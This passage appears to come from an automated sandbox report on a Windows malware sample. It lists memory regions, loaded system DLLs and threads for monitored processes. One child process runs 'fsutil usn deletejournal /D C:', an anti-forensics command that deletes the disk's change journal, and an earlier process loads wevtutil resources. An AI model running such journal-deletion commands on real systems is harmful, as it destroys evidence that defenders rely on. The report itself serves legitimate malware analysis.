"private_0x000000007ffe0000" filename = "" Region: id = 796 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 797 start_va = 0x330000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 798 start_va = 0x74710000 end_va = 0x7476bfff entry_point = 0x7474f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 799 start_va = 0x74770000 end_va = 0x747aefff entry_point = 0x7479de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 800 start_va = 0x74dd0000 end_va = 0x74dd7fff entry_point = 0x74dd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 801 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 802 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 803 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 804 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 805 start_va = 0x4e0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 806 start_va = 0x748d0000 end_va = 0x74911fff entry_point = 0x748d1360 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\SysWOW64\\wevtapi.dll" (normalized: "c:\\windows\\syswow64\\wevtapi.dll") Region: id = 807 start_va = 0x749c0000 end_va = 0x749eafff entry_point = 0x749c14af region_type = mapped_file name = "credui.dll" filename = "\\Windows\\SysWOW64\\credui.dll" (normalized: "c:\\windows\\syswow64\\credui.dll") Region: id = 808 start_va = 0x74e00000 end_va = 0x74e0bfff entry_point = 0x74e010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 809 start_va = 0x74e10000 end_va = 0x74e6ffff entry_point = 0x74e2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 810 start_va = 0x74e70000 end_va = 0x74f7ffff entry_point = 0x74e832d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 811 start_va = 0x75e00000 end_va = 0x75f5bfff entry_point = 0x75e4ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 812 start_va = 0x75f60000 end_va = 0x75ffffff entry_point = 0x75f749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 813 start_va = 0x76020000 end_va = 0x7610ffff entry_point = 0x76030569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 814 start_va = 0x76110000 end_va = 0x7619efff entry_point = 0x76113fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 815 start_va = 0x76480000 end_va = 0x7657ffff entry_point = 0x7649b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 816 start_va = 0x76580000 end_va = 0x7661cfff entry_point = 0x765b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 817 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 818 start_va = 0x76940000 end_va = 0x769ebfff entry_point = 0x7694a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 819 start_va = 0x76b20000 end_va = 0x76b65fff entry_point = 0x76b27478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 820 start_va = 0x76b70000 end_va = 0x76b88fff entry_point = 0x76b74975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 821 start_va = 0x76bf0000 end_va = 0x76c7ffff entry_point = 0x76c06343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 822 start_va = 0x76eb0000 end_va = 0x76fcefff entry_point = 0x0 region_type = private name = "private_0x0000000076eb0000" filename = "" Region: id = 823 start_va = 0x76fd0000 end_va = 0x770c9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fd0000" filename = "" Region: id = 824 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 825 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 826 start_va = 0x5e0000 end_va = 0x767fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 827 start_va = 0x762b0000 end_va = 0x7637bfff entry_point = 0x762b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 828 start_va = 0x76b90000 end_va = 0x76beffff entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 829 start_va = 0x30000 end_va = 0x3afff entry_point = 0x30000 region_type = mapped_file name = "wevtutil.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\wevtutil.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wevtutil.exe.mui") Region: id = 830 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 831 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 832 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 833 start_va = 0x770000 end_va = 0x8f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 834 start_va = 0xe00000 end_va = 0x21fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 835 start_va = 0x74320000 end_va = 0x744bdfff entry_point = 0x7434e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 836 start_va = 0x76890000 end_va = 0x768e6fff entry_point = 0x768a9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Thread: id = 30 os_tid = 0xa0c Thread: id = 31 os_tid = 0xa10 Process: id = "11" image_name = "fsutil.exe" filename = "c:\\windows\\syswow64\\fsutil.exe" page_root = "0x6dd17000" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x9d0" cmd_line = "fsutil usn deletejournal /D C:" cur_dir = "C:\\Windows\\system32\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e144" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 837 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 838 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 839 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 840 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 841 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 842 start_va = 0x1c0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 843 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 844 start_va = 0xe10000 end_va = 0xe23fff entry_point = 0xe1f363 region_type = mapped_file name = "fsutil.exe" filename = "\\Windows\\SysWOW64\\fsutil.exe" (normalized: "c:\\windows\\syswow64\\fsutil.exe") Region: id = 845 start_va = 0x770d0000 end_va = 0x77278fff entry_point = 0x770d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 846 start_va = 0x772b0000 end_va = 0x7742ffff entry_point = 0x772b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 847 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 848 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 849 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 850 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 851 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 852 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 853 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 854 start_va = 0x3e0000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 855 start_va = 0x74710000 end_va = 0x7476bfff entry_point = 0x7474f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 856 start_va = 0x74770000 end_va = 0x747aefff entry_point = 0x7479de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 857 start_va = 0x74dd0000 end_va = 0x74dd7fff entry_point = 0x74dd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 858 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 859 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 860 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 861 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 862 start_va = 0x5d0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 863 start_va = 0x74a10000 end_va = 0x74a18fff entry_point = 0x74a11830 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\SysWOW64\\ktmw32.dll" (normalized: "c:\\windows\\syswow64\\ktmw32.dll") Region: id = 864 start_va = 0x74c20000 end_va = 0x74c2efff entry_point = 0x74c212a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 865 start_va = 0x74c30000 end_va = 0x74c48fff entry_point = 0x74c31319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 866 start_va = 0x74c50000 end_va = 0x74c58fff entry_point = 0x74c515a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 867 start_va = 0x74c60000 end_va = 0x74c70fff entry_point = 0x74c61300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 868 start_va = 0x74e00000 end_va = 0x74e0bfff entry_point = 0x74e010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 869 start_va = 0x74e10000 end_va = 0x74e6ffff entry_point = 0x74e2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 870 start_va = 0x74e70000 end_va = 0x74f7ffff entry_point = 0x74e832d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 871 start_va = 0x75e00000 end_va = 0x75f5bfff entry_point = 0x75e4ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 872 start_va = 0x75f60000 end_va = 0x75ffffff entry_point = 0x75f749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 873 start_va = 0x76020000 end_va = 0x7610ffff entry_point = 0x76030569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 874 start_va = 0x76480000 end_va = 0x7657ffff entry_point = 0x7649b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 875 start_va = 0x76580000 end_va = 0x7661cfff entry_point = 0x765b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 876 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 877 start_va = 0x76940000 end_va = 0x769ebfff entry_point = 0x7694a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 878 start_va = 0x76b20000 end_va = 0x76b65fff entry_point = 0x76b27478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 879 start_va = 0x76b70000 end_va = 0x76b88fff entry_point = 0x76b74975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 880 start_va = 0x76bf0000 end_va = 0x76c7ffff entry_point = 0x76c06343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 881 start_va = 0x76eb0000 end_va = 0x76fcefff entry_point = 0x0 region_type = private name = "private_0x0000000076eb0000" filename = "" Region: id = 882 start_va = 0x76fd0000 end_va = 0x770c9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fd0000" filename = "" Region: id = 883 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 884 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 885 start_va = 0x6d0000 end_va = 0x857fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 886 start_va = 0x762b0000 end_va = 0x7637bfff entry_point = 0x762b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 887 start_va = 0x76b90000 end_va = 0x76beffff entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 32 os_tid = 0xa18